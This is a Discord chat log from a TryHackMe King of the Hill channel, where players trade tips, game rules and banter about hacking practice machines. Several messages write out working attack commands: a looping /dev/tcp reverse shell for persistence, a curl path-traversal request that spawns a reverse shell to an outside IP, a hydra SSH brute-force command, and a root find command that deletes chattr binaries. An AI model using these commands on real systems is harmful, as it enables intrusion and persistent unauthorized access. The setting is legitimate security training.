#koth
1 messages Β· Page 37 of 1
hi
any want to play
this box hates me
box is slow
HI
hey
WANNA PLAY?
already in a game
yup
ok enjoy it
@exotic quiver its been 5 minutes of me ruinning linpeas...
thats a yikes π
this is cursed so much
I've already got root
just not doing anything rn lol just chillin
its not working
my shell keeps dying on its own..
try a different port
that happened to me before
----ia-------e-- /root/king.txt 
π
@weary marten that's an interesting binary you got there buddy
xD
lol love the perms set on king.txt by you guys
gg
Somebody create a new game
we got windows...
Everyone join this game instead
Join quick!
2.5 mins remaining
im still at work, but i join, i will try multitasking π
:DDD
some people watch reddit at work
you, however, do thm
true chad
Yeah, THM is more fun then reddit π
+1
specially the discord π
Good luck guys
Hey I just joined the game can I have one reset plz ?
don't know
Is the rootkit coming soon ?
GG's
i couldnt get the backdoor shell to work...
you were playing this time @rancid pewter ?
but was fun anyway
after last reset
GG
Want to do another game ?
im in
Good
Want a specific box ?
random is fine
if someone streaming theirs KOTH sessions send me a link i love to watch it to learn me different techniques
oh, first time playing this room, be nice guys π
Sorry already king
also kig π€£
who ran fake chattr π€¦ββοΈ in while loop
Removed
oops
not me.. but i felt for it^^
reset???
someone borked sudoers. nice
You were lucky I there was a typo in my backdoor
π
who is resetting tho?
the ones who are locked out ^^
no chmod 5:
sudoers is gone
perl -e 'chmod 0755, "file"'
@nova tide Are you the one moving all the binary ?
at least i dont know any other way to privsec
I was just to late
i'm not playing anymore
it takes time to build up stuff and everyone just resets
@nova tide Are you the one moving all the binary ?
@rancid pewter not all. just 2,3 that you need
it takes time to build up stuff and everyone just resets
@nova tide +1
Yeah that true sorry for reseting
nvrmnd
Also, your typo is still there. (I am lucky I guess)
kig?
The little type just pissed me off since after all the binary were moved chmod, wget
no, myDonut borked sudoers (again)
I am not even on the box
The little type just pissed me off since after all the binary were moved chmod, wget
@rancid pewter i can send you what i moved them too
well then its someone with a machinegun and dont know how to use it.
GL
Let do a last reset at like 30 mins or so
btw nice DP though
took you so long to change π
i was just used too long at that blue one
π
what happend with king.txt ? π
π€¨
i cant write to it^^
anyone want to join random machine?
@zinc furnace that's a spectator link
click on Options from top right corner and copy paste invite link
ohh sorry for that
my bad
GG all
Yeah with chattr
You need to download it from your box
ohh
and or upload it into the box you intent to use it on
i see π thx for the tipp
im playing on MacOS ^^so yeah, kinda tricky sometimes
As your main OS ?
yes
...
also doing all ctf's on MacOS.. but i'll have to switch to kali VM or something.
i cant, get kicked out once i use it.
@fair adder the one you were using was pre installed binary named as chattr that would kill your shell..
yeah, thats why i have to install kali, to upload my chattr bin, (no chattr on my mac)
thanks for the games guys, was fun (and thx for the tipps) see you next timeπ
i use my mac to do koths too
lmaoo
@fair adder Using chattr from kali wonβt work since it linked with library which may not be on every box so you need a statically compiled. You can compile it yourself or download it from the internet
thx i found it π
or write a C script with 50 thread in 5 different process to brute force it
i tried but that won't over do rootkit 
yeah, im still new in ctf's so i appreciate every tipps from you guys.
the only thing i have done so far is installing ubuntu and kernel
congrats 
Nice
even Screamy competition was during my finals
well that one i just won coz i was lucky i guess
in first 15 minutes we thought your rootkit is in action 
so my team gave up xD
I havenβt done anything in the finals the 15 mins were by my teammate
even though i found all of the bianries in /var/dev/X11/<all the binaries hidden by your team>
but still my team left VC
yeah i heard about that
I was just focusing too much with my rootkit that was not working
you done with that yet?
Yeah took me 30 sec too fix
I need my revenge
i will try to join in.. but mostly on Eid will be busy with alooot of guests that gonna ruin the internet with 1080p youtube videos,downloads/uploads. and serving them food and all the stuff of Eid.
Join if you want and if you feel like it but soon enough I will get my revenge
Join if you want and if you feel like it but soon enough I will get my revenge
@rancid pewter looking forward to that..
i still wanna do a proper match against your rootkit some day.. when i am done with working on mine i will ping you.. then we can set a time to play
Whenever you want I am always ready
π
lol myDonut is ready to win the 50 USD lmaoo
well i'm not in the competition for the prize i just wanted to play with good players.. the screamy competition was aloot of fun...
yea i feel u
in competition we can atleast follow some rules and there aren't noobs like who spam reset button after you change password for one user
i had someone from third round dm me complaining that why he's not on the final and i was like simply because you didn't pass
lmao
Naughty how do you get your name in king.txt I just can't find it
i ran it in a loop
i wasn't playing. was just updating my SixSiege
1.2 gb update
but came back when i saw you are 3 minutes king π
had to pause the update
after loop i just continued the update
i also don't play food. its not fun as there is already a writeup for it.
Whats the fun in using a writeup
i said it exists.. so its not fun as everyone can use the writeup
@nova tide and @zealous sun any hints??
Hints for what?
what was vulnerable?
I got in with mysql
so itSo the port and connected
tried some users
one got a hit without password
okay
who is attacking the production koth so hard that it is not working at all?
https://tryhackme.com/games/koth/7934 this one I'm talking about
I can't even ssh into the machine!
is making a script which kills all incoming pts allowed in koth?
i was wondering what was wrong lol
I'm looking for the Documents for KOTH, can't seem to find any. There are specific rules and as a non-KOTH player I can't relay them all. Give me a few minutes.
Yes, this was discussed several times here with Ninja I think? but I don't know if rules changed
Ah they're on the KOTH page
To prevent cheating and ensure this game is realistic, everyone must the follow the rules:
The machine should not be made unavailable (shutdown, firewall rules to stop all communication, all services terminated, machine botching etc..)
Only stop a service if it can't be patched any other way. Services should remain available for "genuine users of the box" if at all possible.
No modifying/removing flags
Do not attack, modify or stop the service on 9999
Any sort of DoS against the machine
No attacking other users
Scripts that automatically hack and/or harden the machine are forbidden
Games are moderated, and failure to abide by the rules will result in a game and/or site ban.
so if i can login via id_rsa but my shell keeps closing can be considered as "cheating"?
No
trying to understand / learn
If your shell keeps closing because someone else is closing it, that is not allowed.
Hi friends
we consider any type of scripting as "autopwning"
Am working with the other staff to get that double-checked and formally written up now that our new help site (former to the docs) is beginning to launch
@brazen cloud can I dm you?
π
regarding please? I'm a tad busy so will reply as and when (l @patent forge
infos about this topic, of course i don't care about the koth itself, but i just wanna know what I'm allowed to do
becase of course we can all make a script which kills all pts and basically make the machine unaccessible
like what i'm wasting my time on for the past 40 minutes
random machine
anyone want to join???
@zinc furnace is the game running?
who wants to play
hellp @visual spire
how are u doing
i am doing great wbu?
its just a random one. sooo no idea
there is only one windows machine and that's offline that i hate
hi
Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.
ok
im sorry
i just wanted to ask u
if you could teach me how u got into the machine
when we played together on shrek machine
GG
starting in next 3 mins anyon want to join
random machine
@visual spire are you free now?
just finishing one game in few mins
join the voice chat @rancid pewter
My speaking english is really bad
i am free now
Oh hell no Offline
Let do 10 mins than I start another one
na na i will start another one now
no but linux
ok
probably should have started my vm before clicking the link
GG all
are there rules about when you are allowed to reset the box?
if anybody is created a room then send me the joining link
are there rules about when you are allowed to reset the box?
@coral sage It should only be done if a rule has been broken, or someone accidentally destroyed the box
Not being able to get in (if the machine has been successfully patched, and no rules broken) is not a good reason
Not being able to get in (if the machine has been successfully patched, and no rules broken) is not a good reason
@terse willow is there any possibility this being added in koth rules smh? Also it had 15 upvotes in #641405480547385354 .
Idk if i said it before or not but good luck with oscp
Yeah, tbh, KoTH rules need to be refined.
@lusty portal any chance of that getting added to the KoTH rules next update? Kinda unspoken already, but might as well set it in stone
Ah yes, let me do that now (locally)
Finallyπ
and here i was planning to leave KoTH π
Hopefully it will be more fun after rules.
Also koth teams gonna be a lit update β₯οΈ
guys koth is really fun but unfortunately the machines pool is limited and if someone see a machine for the second time it's much more easy for him/her...
is there any way to solve this problem??
i already feel in love with this kind of a&d challenges and i need more π
Make more KoTH boxes
Has there been a new room / pool set released yet?
Not for a while
There are a few in testing
??
chattr is the command in the GNU operating system (with Linux kernel) that allows a user to set certain attributes of a file. lsattr is the command that displays the attributes of a file.
Most BSD-like systems, including macOS, have always had an analogous chflags command to s...
Doesn't that command only work on certain machines
Should work on all *nix machines that have the e2fsprogs package installed.
the binary itself should work on all filesystems that support these file attributes
if the package is installed the binary would be installed but it isn't necessary for using the functions
π
what should I do if I can't use chattr on the machine? I did some research and I didn't get nothing
can't use chattr meaning the binary isn't there?
can I pm you?
ye
ty
public game starting in 3 minutes
Started?
Click and find out
Make a room, I'll join. maybe
Anyone up for KOTH?
@nova tide can i dm u for a thing??
sure
ok
Well played @sturdy plank π
Can anyone explain me how koth works?
Well its an hour long game where you compete with other players to gain highest points. You are given a machine to hack within an hour. Points are accumulated by finding flags placed within the machine and by being "king" (you must have your username in /root.king.txt file). Once you gain root access you can use different methods to prevent your competitors from gaining access to the machine.
Thanks
Also make sure you've read and understood the rules
Well played @sturdy plank π
@deep jolt thx
hello guys ? in KOTH are we authorized to reduce permission of the flag once we are root ?
I don't see a problem with that, as long as you don't delete them. If you make it so that only root can read them then that should be fine, as other people can still get root
yeah cool thanks ,dude !
What's happend when you win a KoH?
Not much
Hey
how did you send message through the urandom?
@safe saddle multiple shells
how?
@safe saddle multiple shells
@stiff egret
I don't think you have a backdoor,
nope
yes :))))
i didn't created any...
i've played this box already...
i just want some fun
and learn some way to stay sneaky..
and learn some tricks.
yeah well rev shells don't come with a tty.
ok...
so what else?
what methods do you use to create backdoors?
other than creating a webshell in web root dir?
what other methods ?
what methods do you use to create backdoors?
@safe saddle google?
ok :)))
i know...
we are just chatting...
some loops to keep sending me rev shells. maybe
that's nice...
using crons...
Yes.
thank you
π
hi, im new here. In Koth do you need openvpn?
yes
does it connect automatically when i run openvpn /filename.ovpn/
Yep.
ok, also in koth the web server crashes alot, i lose connection. How could i fix that?
not only in koth, also in rooms
Sounds like VPN issues. #site-support
ok, thx
@stiff egret it didnt work
um What?
What do you mean, "didnt work"? You ran the script?
Well, then read the script's output. You will see there are binaries that are exploitable.
@visual spire for priv esc after logging in as shifu you can exploit sudo permissions
shifu$sudo -l
search in gtfobins
https://gtfobins.github.io/
@safe saddle thanks man
yeap :/@deep jolt
is anyone playing KOTH
windows machine sucks seriously!!!
Ah crap I accidentally joined by accident
hey b14ckdz
great game
but while doing cat on king.txt i see my name still you are the king π
it doesn't change immediately, it's updated every minute
yeah i was on the file for 15 mins but still
Anyone playing KoTH?
me
send. the. link.
private??
your choice, I just wanna play, I am feeling sleepy and this will wake me up.
4mins
random
xD
ugh, @zinc furnace join in, we are already in it
yeah join in
send me the link??
@zinc furnace
1min left @zinc furnace
joined!!!!!
@stiff egret was that u π
lmao
wild entry
True, was in a conversation, also, you didn't patch a direct route to root.
yeah 
but root looks patched π
anybody exploited shellshock??
@stiff egret @autumn iron what all the things you exploite???
um, shellshock? which user are you trying to get in from?
what all the things you exploite???
@zinc furnace i didnt get you..
π ig u cant post this
@autumn iron how you got shell?
after the game please π
I haven't used any chattr, the file is mutable.
@stiff egret @autumn iron any hints bro???
um, π€ there's an public cve and a writeup for this box. (self promotion)
your git hub π
i found only directory traversal
and searching for the same
but you already patched it
I don't think so.
okay lets start the new one
not me got some work you guys continue
okay no issues
Hello, I found a flag in kOTH, but when i submit it says flag incorrect
is it possible that someone modified the flag?
its encrepted
ohhhh
yeah how did you know?
im playing with you
LMAO
im UM240
damn you good
how much time?
ok, gimme a sec
ok
cyber chef is like a decoder??
yes
The Cyber Swiss Army Knife - a web app for encryption, encoding, compression and data analysis
Oh I got it Thanks man!!!
is it always from hex and from base64??
only the flag
always the same encoding, right?
yes
yeah is it always the same name
whats that
where you at now
nowhere, i am trying to find directories with dirb
i found a lot of directories in the wordpress but they all lead to nowhere
ok
i found a js direcory
hydra
ohhh what was the original password?
batman
what was the link of the login for the admin? i cant find it
because hydra needs to get the url for the login
can i see your hydra command?
hydra -l shifu -P /usr/share/wordlists/dirbuster/directory-file-2.3-mediem.txt ssh://ip -t 4
ok i see
are you ready??
also, i did cat flag.txt and i got a flag but i put it in the from hex from base64 and it doesnt give anything
oh, lol its not encoded
ok i also have another question, in your command hydra -l shifu -P /usr/share/wordlists/dirbuster/directory-file-2.3-mediem.txt ssh://ip -t 4 all i need to do to reuse this is change the ip right?
lol
oh, was that two different commands??
oh yeah, how do you stop the spam??
and instad of file write list
i use gobuster
thats it?
oh, cool, so what do you do once you get into the machine?
the panda one?
yeah
i go root
sudo su root
and if it doesnt work
use sudo -l
and it will show what can the user run as rot
wow
hey
so you found the king.txt file there, right??
Would you mind having this conversation in DMs
u can use it to get to the root
you're spoiling the box π
@fair adder wooooow
thats really cool, but i cant stop your script from spamming?
bruh
i know
DMs please
ubay u know panda machine commands??
go dm
ayt
space jam is too easy man!!!!!!!
The machine pool is created for literally every skill range
Space jam was the first (beta) and it's comparatively easy to ones like Offline so
all perspectives (:
Space jam was the first (beta) and it's comparatively easy to ones like Offline so
@brazen cloud offline is easier
can teach us how to create persistence
nohup bash -c "while true; do bash -i >& /dev/tcp/<IP>/<PORT> 0>&1 || sleep 5; done 2>&1 >/dev/null" >/dev/null
I just run this
not all linux machines have the /dev/tcp device enabled so it might not work on all boxes :)
If you are in bash it works
π
Might need to type it again to much /Dev/null
lol
@zealous sun killall bash will blow that up.
Use zsh
Why not fish?
i am new to this can anyone help me?
from like the very start like ion even know ever to start π’
I know what to do but I can't even ping the box
try -f ping
yeah nothing
hm
yes
You may need to reset, I can't ping it either.
there
starting in 2 minutes 30 seconds
Public room:
https://tryhackme.com/games/koth/join/8405e576ab3ecdecabe57b5f
Hey @nova tide is the rootkit coming ?
Hey @nova tide is the rootkit coming ?
@rancid pewter its still Eid, still guests are coming.. just came back from Swimming Pool went with guests.. finally got some time to even turn on pc
@nova tide please do not patch anything in this game
@nova tide please do not patch anything in this game
@zinc furnace sure
invite link
thanks buddy......
sudo invite link
sudo invite link
@stiff egret User is not in sudoers, Incident will be reported
no patching rule?
@stiff egret User is not in sudoers, Incident will be reported
@nova tide you have a mail
alright no probs. I need to test a few things anyway. Tho I can attack king file right?
@nova tide Wanna DM ?
sure???
hi
hi
are you playing
no
@visual spire you patched man???
yes
hahhhaahha
i also patched man
ok
@visual spire how yo are esclating priveleges??
/bin/sh -c /usr/bin/find / -name "chattr" -exec rm -rf {} ;
@visual spire you ran this???
naa
it was running with root
i ran this curl -s -X POST 'http://10.10.10.165/. ./. ./. ./bin/sh' -d '/bin/bash -c "/bin/bash -i >& /dev/tcp/10.10.14.6/443 0>&1"'
and rlwrap nc -lvnp 443
at the same time
one tmux session was also running with root
and when you ssh to it
with the id-rsa key
it shows that you need a key word
it was dance
yes man
why didn't you put your name in the king
file
you saw this is UM240 messages right??
i deleted that
you can ssh with that key
so that no one can use
you couldnt root
yes i was struggling to be root
no i have not used it
there was one service that i exploited to login to the box
and after that deleted the keys
what machine
random
@zinc furnace
first time seeing this one
me too
@visual spire you exploited ping??
it doesn't work
@zinc furnace
not yet
ok
how many flags you found on mysql db?
one
and after that?
database name???
hhhh
nmap -sC -sS -sV -p- -oN nmap ip
got it man
ok
how can i miss the userπ«
don't let the flag do to you like that
only focusing on flag
please delete your last screenshot
why
rules buddy
can you give me your whatsapp???
any social media account??
@visual spire 2nd time now. Please keep spoilers for machines in DMs.
Just don't spoil the machines here please
koth goin on wanna join
Anyone up for a KOTH?
I'll lose anyway, but yeah sure why not?
I'll join asap
Dud, don't close ports
Or is it allowed??
didn't closed anything π
as you text me the rules, you can check them by yourself
beeing rude of course doesn't help you in a koth
π
Rude with wut?!
check dms π
!rule 1
Rule 1: No unsolicited direct messages (DMs) to other members of the discord. This includes staff. Verify that the member you are messaging is ok with you sending them DMs. The only exception to this rule is if a situation warrants the involvement of a moderator in order to handle something such as harassment or a situation where another member of the discord has made you feel uncomfortable.
yeah sure, you had just accepted a koth invite, and i just asked you if you prefer doing a friendly game
what's the point of sending me rules like if I text you for asking kiddie stuff?
i was just trying to be nice with you, like with everyone else in this community.
I accepted the game not the dm
yeah sure
so play
you are losing time, nothing closed or patched either (at the moment)
Then nmap goes wrong only now??
or maybe you cannot use nmap
xD
there are a lot of ports man
just enumerate :9
btw i've already patched the node way (of course)
following the rules
Dud, don't close ports
Or is it allowed??
@ornate token which machine and which port?
Spacejam, 3000
the service is running my hero @ornate token
lemme boot up my VM
Nmap shows 23, 22, 80, 9999, but 3000 not anymore
................
didn't do that π
check the nmap scan you did close the port smh
can i dm you @nova tide ?
Naughty, there's other way in?
how can you actually patch a service which is a sudo RCE itself?
i should follow rules and just kill that.
Naughty, there's other way in?
@ornate token of course
Naughty, there's other way in?
@ornate token Yeah there are
π
@nova tide I didn't even uninstall chattr....
who i said i did??
no, i was saying that because you were "trying" to say that i'm cheating
of course (following the rules) i was able to kill the node service
just enumerate :9
no, i was saying that because you were "trying" to say that i'm cheating
@patent forge pretty sure i never used the word "Cheating"
@patent forge is just good and quick π and a stickler for rules
@patent forge is just good and quick π
@tepid hornet fight me
I still want to play with you @tepid hornet π
@nova tide yeah, my english is pretty bad with arguing
so i can't explain very well what i'm trying to say
I still want to play with you @tepid hornet π
π yeah me too
well forget about what happened before. i joined game after 33 minutes.. now its your turn to get king
didn't patch any way in, nothing is closed π
you are losing time, nothing closed or patched either (at the moment)
i jus said your ways are still available.. even node is up.. just get king
Oi @nova tide
@stiff egret yo
@nova tide i just got pissed by this situation
I don't like playing this way (not talking about you of course)
or you can just talk against the people who just started koth?

I don't like playing this way (not talking about you of course)
@patent forge what way? care to elaborate?
I think you "know" me, i always ask for friendly koth for learning stuff
dmming someone who just accepted a koth invite and get "rule 1" as response, just broke my mood π
well it is rule.. no one ever said you are allowed to DM anyone who is playing KoTH with you
imo, you don't need to DM unless it's some spoiler.
idk how that ruins your mood π€·ββοΈ
yep, but beeing nice is part of the game i think
you can be nice here. no need to be nice in DMs
Was I harsh?
i just don't like playing like this
I'm sorry aswell for being rude :')
ayeee β€οΈ everyone being nice again 
https://tenor.com/view/nyan-cat-rainbow-cat-kitten-kitty-gif-5716621
@nova tide Nyan β₯οΈ


